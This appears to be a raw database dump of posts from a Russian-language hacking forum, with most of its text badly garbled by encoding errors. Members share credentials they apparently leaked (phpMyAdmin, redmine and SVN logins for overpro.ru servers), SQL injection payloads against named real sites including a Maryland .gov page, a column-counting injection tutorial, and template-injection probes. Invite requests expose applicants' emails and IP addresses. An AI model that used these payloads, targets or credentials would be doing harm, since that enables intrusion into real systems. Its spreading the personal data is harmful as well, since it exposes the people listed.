AAAAB3NzaC1yc2EAAAABIwAAAQEAuv2ioeA/X6/VFZ7OKJenjTpoec1tacNigsDo31pzMatrwklD1JTp+tQA2yrmPkvTUkLkXS2OLluJ01jUsLXgAwo1is971tHlTqXD6zF5kei0Jjby9RMMMVCmXnbZiuE2KsGdR8nd9ocATc8B5Uviw42qJL7Ds7khAnSbfjQ0Y2vF/LjF46A79ozkeL/+h8vYU87KBapy0oGWxhe1DjQQwDI3l59PGXuswpLPSEAMbfO/BvKX9AwrrJ0Kt0WiKdbjd4UzBF9GELrPXAIcZOa3Mgg6P4wGXH8/qjA56MN+j8asAMhvEDw8bSaby3izkCFGzYfq1f9W/8lrQ28plbgMkw==\n\n[/code]', 1, 0, '', 0, 1, 0, 0, 0), (1862, 1612, 1833, 'w0rm', 1, '', 1409556211, 'ÿþÿðôðõü ýð þôýу ø÷ ÿрþúÑÂø.', 1, 0, '', 0, 1, 0, 0, 0), (1863, 1623, 0, 'Invite', 2, '{$name}', 1409557547, '[SIZE=\'4\'][COLOR=\'Sienna\']Amir Reza[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: aaaamirrezaaaa\n[b]e-mail[/b]: aaaamirrezaaaa@gmail.com\n[b]Info[/b]: I\'m interested in reverse engineering and malware development in Android. I have lots of unique family for Android. There are lots of cracked analysis tool for dex file like jeb or some obfuscaters.\r\n\r\nAlso I\'m good at linux systems and how they work \r\n\r\nbla bla bla lots of thing inside me :)\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 144.122.98.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/amirrezaf | https://twitter.com/amirrezaf \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1864, 1612, 1833, 'unlog', 45, '', 1409565212, 'phpmyadmin þтòðûøÃȄÂѠþт ÑÂõрòõрð (#2002 - The server is not responding). Úтþ-тþ чтþ-тþ ôõûðû?', 1, 0, '', 0, 1, 0, 0, 0), (1865, 1612, 1833, 'w0rm', 1, '', 1409565329, '2 øÿ c ÿð Ѡþôýþóþ рðñþтðõт Ѡôруóþù ýõт.', 1, 0, '', 0, 1, 0, 0, 0), (1866, 1622, 1857, 'Psych0tr1a', 11, '', 1409567772, 'ua ýõ ÿþùôõт?', 1, 0, '', 0, 1, 0, 0, 0), (1867, 1624, 0, 'Psych0tr1a', 11, 'шõûûы ýð .gov', 1409567924, 'Úтþ ýøñуôь ÷ýðõт úтþ ÑÂúуÿðõт шõûûы ýð .gov ÑÂðùтðх?', 1, 0, '', 0, 1, 0, 0, 0), (1868, 1612, 1833, 'unlog', 45, '', 1409568393, '[quote=w0rm;1865]2 øÿ c ÿð Ѡþôýþóþ рðñþтðõт Ѡôруóþù ýõт.[/quote]\nôõùÑÂтòøтõûьýþ, ýõ þñрðтøû òýøüðýøõ:)\n\nõщõ þôýð ñð÷ð þтúрытð:\n_ttp://88.208.57.184:82/phpmyadmin/\nredmine : o8YCkG5Yx2\n\nò ñð÷õ ôðýýыõ ÑÂðñòõрÑÂøø:\nsvn://dev.overpro.ru/overpro\nlogin : overpro\npassword : hk6cedvhmyjxo83hciqk\n\nу úþóþ õÑÂть ÑÂõрòõр, ÿрþòõрьтõ ÿþöðûуùÑÂтð.', 1, 0, '', 0, 1, 0, 0, 0), (1869, 1612, 1868, 'unlog', 45, '', 1409568466, '[quote=w0rm;1865]2 øÿ c ÿð Ѡþôýþóþ рðñþтðõт Ѡôруóþù ýõт.[/quote]\r\nôõùÑÂтòøтõûьýþ, ýõ þñрðтøû òýøüðýøõ:)\r\n\r\n[quote=unlog;1868]õщõ þôýð ñð÷ð þтúрытð:\r\n[url]http://88.208.57.184:82/phpmyadmin/[/url]\r\nredmine : O8yckg5yx2\r\n\r\nò ñð÷õ ôðýýыõ ÑÂðñòõрÑÂøø:\r\nUrl svn://dev.overpro.ru/overpro\r\nlogin overpro\r\npassword hk6cedvhmyjxo83hciqk\r\n\r\nу úþóþ õÑÂть ÑÂõрòõр, ÿрþòõрьтõ ÿþöðûуùÑÂтð.[/quote]', 1, 0, '', 0, 2, 0, 0, 0), (1870, 1612, 1833, 'w0rm', 1, '', 1409573662, 'úðú òþôøтÑÂÑ ÑÂòý = ssh\n\núøýь ðôüøýð þт Ñ€ÑÂôüðùýð.', 1, 0, '', 0, 1, 0, 0, 0), (1871, 1612, 1833, 'unlog', 45, '', 1409574884, '>>úøýь ðôüøýð þт Ñ€ÑÂôüðùýð. \nýõ ÿþýÑÂû, úðúþóþ ðôüøýð? õÑÂûø ðôüøý-ю÷õрþò, тþ òþт ø÷ ñð÷ы:\n[CODE]\'cyberbattler\',\n\'ekzo\',\n\'draftpin\', \n\'Burunduk\'[/CODE]\n\nIP <=> domain\n[CODE]5.178.87.238 dev.overpro.ru\n5.178.87.238 radio.overpro.ru\n5.178.87.238 eac.0ver.pro\n5.178.87.238 ac.0ver.pro\n5.178.87.238 hltv.0ver.pro\n\n88.208.61.116 overpro.ru\n88.208.61.116 0ver.pro\n88.208.61.116 test.overpro.ru\n88.208.61.116 task.0ver.pro\n88.208.61.116 zeta.overpro.ru\n\n88.208.57.184 db.0ver.pro\n\n31.131.251.105 public.overpro.ru[/CODE]', 1, 0, '', 0, 1, 0, 0, 0), (1872, 1624, 1867, 'BigBear', 34, '', 1409577915, 'у üõýѠõÑÂть чõû, ýþ ýуöõý чётúøù ÑÂÿøÑÂþú ôþüõýþò.', 1, 0, '', 0, 1, 0, 0, 0), (1873, 1624, 1867, 'opensc', 40, '', 1409582182, 'úðúøõ ÑÂтрðýы?', 1, 0, '', 0, 1, 0, 0, 0), (1874, 1625, 0, 'Invite', 2, '{$name}', 1409585723, '[SIZE=\'4\'][COLOR=\'Sienna\']Burak Beyzadeoglu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Not\n[b]e-mail[/b]: hacker@outlook.cz\n[b]Info[/b]: Detail: For whitehat\r\n\r\nhttp://company.nokia.com/en/acknowledgements\r\n\r\nhttps://company.zynga.com/security/whitehats\r\n\r\nhttp://www.constantcontact.com/legal/report-vulnerability\r\n\r\nhttp://ebay.com/securitycenter/ResearchersAcknowledgement.html\r\n\r\nhttp://helpx.adobe.com/security/acknowledgements.html\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.246.254.180\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/BurakBeyzdeoglu | https://twitter.com/BurakBeyzdeoglu \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1875, 1624, 1867, 'Psych0tr1a', 11, '', 1409585812, 'üøшúð þтòõть ò ðÑÂõúу\nø ÿрþòõрь ûøчúу у ÑÂõñÑÂ!!', 1, 0, '', 0, 1, 0, 0, 0), (1876, 1624, 1873, 'Psych0tr1a', 11, '', 1409585892, '[QUOTE=opensc;1873]úðúøõ ÑÂтрðýы?[/QUOTE]\r\n\r\nusa úþýõчýþöõ\r\n\r\n.gov ðýõ gov.*', 1, 0, '', 0, 1, 0, 0, 0), (1877, 1626, 0, 'Psych0tr1a', 11, '[MySQL]áÿþÑÂþñ þÿрõôõûõýøѠúþûûøчõÑÂтòð òыòþôøüых ÑÂтþñцþò ò 1 ÷ðÿрþÑÂ.', 1409586490, 'ÕÑÂûø òы òôруó ýðтúýуûøÑÂÑŒ ýð sqli ò úþтрþù òúûючõý òыòþô þшøñþú тþ òþт тðúøü òþт ýõ÷ðüыÑÂûþòðтыü ÑÂÿþÑÂþñþü üþöýþ þÿрõôõûøть úþûûøчõÑÂтòþ ÑÂтþûñцþò ÷ð 1 ÷ðÿрþÑÂ.\n\nßрþòõрøü òыòþôøтÑÂѠûø þшøñúð!\nþтÿрðòÃȄÂõü\n[code]*+order+by+100+--+[/code]\n\n\n\nÕÑÂûø òÑÂõ хþрþшþ ÑÂтþт ÷ðÿрþѠòыôðÑÂÑ‚ ýðü þшøñúу \n[code]Query failed: Unknown column \'100\' in \'order clause\'[/code]\n\n\n\nßþÑÂûõ чõóþ ÑÂüõûþ òÑÂтðòÃȄÂõü тðúþù ÿÑÂùûþðô.\n[code]+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+[/code]\n\n\n\nÃ’ þтòõт ÿþûучøü\n[code]Query failed: Unknown column \'*\' in \'order clause\'[/code]\n\n\n\nÓôõ \'*\'-1=\'úþûûøчõÑÂтòþ ýðшøх ÑÂтþûñцþò\'.', 1, 0, '', 0, 1, 0, 0, 0), (1878, 1083, 1834, 'Psych0tr1a', 11, '', 1409586755, '[QUOTE=kx00;1834]ÑÂúуûю ýðшõû. ñð÷у ÑÂûøòðù. ты ÿþ úðúþüу ôþüõýу ýðшõû ôырúу?[/QUOTE]\n\nÃÂð ôþüõýõ\n[url]www.toranoana.jp[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1879, 1622, 1857, 'kx00', 6, '', 1409587072, 'ýõт тþûьúþ ру, õщõ ýуöõý ðýôрþùô трðфф, úтþ рþñøт Ñ Play Üðрúõт òõûúþü;)', 1, 1, '', 0, 1, 0, 0, 0), (1880, 1083, 1878, 'kx00', 6, '', 1409587923, '[quote=psych0tr1a;1878]ýð ôþüõýõ\r\n[url]www.toranoana.jp[/url][/quote]\r\núрðÑÂðòð. ýõôõûю øÑÂúðû ÑÂúуûю øûø чтþ ýøñуôь ò ÑÂтþü рþôõ. ÑÂðùт ðóрþфøóõýýыù!!! туÿþ тõрÿõýøѠýõ хòðтøûþ) ÿþшõû ýðñухðÃȄÂÑÂ.', 1, 1, '', 0, 1, 0, 0, 0), (1883, 1083, 1119, 'Psych0tr1a', 11, '', 1409590597, 'ухðхðх))', 1, 0, '', 0, 1, 0, 0, 0), (1884, 1616, 1848, 'w0rm', 1, '', 1409597851, 'Ok. Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ã» ò ÿûðý ýð ôõýь.', 1, 0, '', 0, 1, 0, 0, 0), (1885, 1628, 0, 'Invite', 2, '{$name}', 1409604220, '[SIZE=\'4\'][COLOR=\'Sienna\']greedy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: alice.johnson.67.ny@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 213.112.243.97\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1886, 1629, 0, 'Invite', 2, '{$name}', 1409606276, '[SIZE=\'4\'][COLOR=\'Sienna\']kajika[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: kajika@jabber.ccc.de\n[b]e-mail[/b]: kajika@safe-mail.net\n[b]Info[/b]: I am experienced in coding binary and web. Had a break from scene for 3 years and want to get active again.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.204.150.121\n[*][b]real ip[/b]: 31.204.150.121\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1887, 1626, 1877, 'BigBear', 34, '', 1409625644, 'ÑÂтþ тðúþù ÑÂтёÃ± øûø Ѡýõ ÿþýÑÂû юüþрð?', 1, 0, '', 0, 1, 0, 0, 0), (1889, 1630, 0, 'Invite', 2, '{$name}', 1409631815, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: qweqwe@qq.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 223.73.49.155\n[*][b]real ip[/b]: 223.73.49.155\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/nicknameband | http://vk.com/nicknameband \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1890, 1626, 1877, 'Psych0tr1a', 11, '', 1409666498, 'ð ÿþчõüу ÑÂтõñ тþ?\nýøóôõ ýõ þÿøÑÂðýþ ÑÂтþóþ òþт ø рõшøû ÷ðÿþÑÂтøть\nôÃȄʄÂúÑÂÿûþøтþò ÿрøóþôøтÑÂÑÂ.', 1, 0, '', 0, 1, 0, 0, 0), (1892, 1631, 0, 'Invite', 2, '{$name}', 1409680304, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ${99460+100307}\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.16.36.103\n[*][b]real ip[/b]: 85.16.36.103\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1893, 1632, 0, 'Invite', 2, '{$name}', 1409680306, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: response.write(9713317*9988027)\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.16.36.103\n[*][b]real ip[/b]: 85.16.36.103\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1894, 1633, 0, 'Invite', 2, '{$name}', 1409680311, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: response.write(9713317*9988027)\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.16.36.103\n[*][b]real ip[/b]: 85.16.36.103\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1895, 1634, 0, 'Invite', 2, '{$name}', 1409684278, '[SIZE=\'4\'][COLOR=\'Sienna\']yusk3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ysk@inbox.im\n[b]e-mail[/b]: ysk3@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 187.144.73.251\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1896, 1635, 0, 'Invite', 2, '{$name}', 1409693476, '[SIZE=\'4\'][COLOR=\'Sienna\']Nicknamewerwer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabberasdsad\n[b]e-mail[/b]: Emailsadasd@weqeqw.gdfgf\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.231.221.211\n[*][b]real ip[/b]: 178.175.139.139\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1897, 1636, 0, 'Invite', 2, '{$name}', 1409711516, '[SIZE=\'4\'][COLOR=\'Sienna\']pavqk[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: pavqk@suchat.org\n[b]e-mail[/b]: marksp85@hotmail.com\n[b]Info[/b]: Hello w0rm\r\nI am a person who does not like to appear too on the web. \r\nHowever I like a lot of security and know enough. \r\nHave knowledge XSS, SQLi, LFI and some other techniques. I know PHP and Mysql too. Since I was 14 I was always interested in the subject and acquire knowledge by that.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.214.64.224\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://pavqk.banjiazheng.rjokztw.com | pavqk.banjiazheng.rjokztw.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1901, 1638, 0, 'null', 9, 'sql inj kontakten.dn.se', 1409747318, '[url]http://kontakten.dn.se/index.php?pg=ProfileSearch&AdNum=201484[/url]\r\n\r\nßðрðüõтр AdNum', 1, 0, '', 0, 1, 0, 0, 0), (1902, 1638, 1901, '123', 41, '', 1409748676, '4 òõтúð ÿхÿ ø 4 òõтúð üуÑÂúуû, öõÑÂть )', 1, 0, '', 0, 1, 0, 0, 0), (1903, 1638, 1902, 'null', 9, '', 1409760496, '[QUOTE=123;1902]4 òõтúð ÿхÿ ø 4 òõтúð üуÑÂúуû, öõÑÂть )[/QUOTE]\r\náðüþóþ ÿþрðôþòðûþ', 1, 0, '', 0, 1, 0, 0, 0), (1904, 1015, 1017, 'viking', 0, '', 1409770946, 'verified.sql.zip is password protected!, what is password?', 1, 0, '', 0, 1, 0, 0, 0), (1905, 1639, 0, 'Psych0tr1a', 11, 'SQLi www.goccp.maryland.gov', 1409781988, '[code]http://www.goccp.maryland.gov/training/provider-details.php?id=111\'+union/**/%73elect/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+[/code]\n\näøûьтр ÑÂрðñðтыòðõт ýð ÑÂûþòþ select\nÚðú ýøñуôь üþöýþ þñþùтø?\n\nçтþñы úрутøть ýуöýþ þтúûючøть рõôøрõúт.', 1, 0, '', 0, 1, 0, 0, 0), (1906, 1640, 0, 'Invite', 2, '{$name}', 1409785756, '[SIZE=\'4\'][COLOR=\'Sienna\']Tanreon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: kabachok@dukgo.com\n[b]e-mail[/b]: thoriumas@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.233.206.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our 